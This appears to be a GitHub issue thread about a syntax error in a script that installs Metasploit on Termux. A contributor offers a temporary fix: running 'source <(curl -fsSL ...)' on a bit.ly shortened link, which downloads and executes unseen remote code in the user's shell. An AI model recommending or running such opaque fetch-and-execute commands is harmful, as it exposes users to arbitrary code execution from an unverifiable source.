### ISSUE TITLE
[Syntax Error In metasploit.sh on line 101]

### ISSUE THREAD

**Issue by sys-kill187** [gushmazuko/metasploit_in_termux#163]
![Screenshot_20220731-064918](https://user-images.githubusercontent.com/95592864/182002691-11873931-4296-4c1c-8942-de204cb57e97.jpg)

**Comment by krisdowis** [comment]
So sorry 
It's my fault
Will fix it right away

**Comment by krisdowis** [comment]
This was my mistake I made an error while contributing to the code but I already opened a pull request to fix it The owner hasn't approved yet because he is busy but you can fix with this command for now
 ```
source <(curl -fsSL https ://bit.ly/3cTWx5g)
```

Please note this is to fix the error for now I will remove/disable the link once owner approves pull request or fixes error

**Comment by krisdowis** [comment]
Please let me know if you were able to fix the problem or if you still have errors

**Comment by sys-kill187** [comment]
Thank's I was expecting this for now it was closed...🎉

**Comment by krisdowis** [comment]
Okay
Don't forget to follow me on github @krisdowis 😊
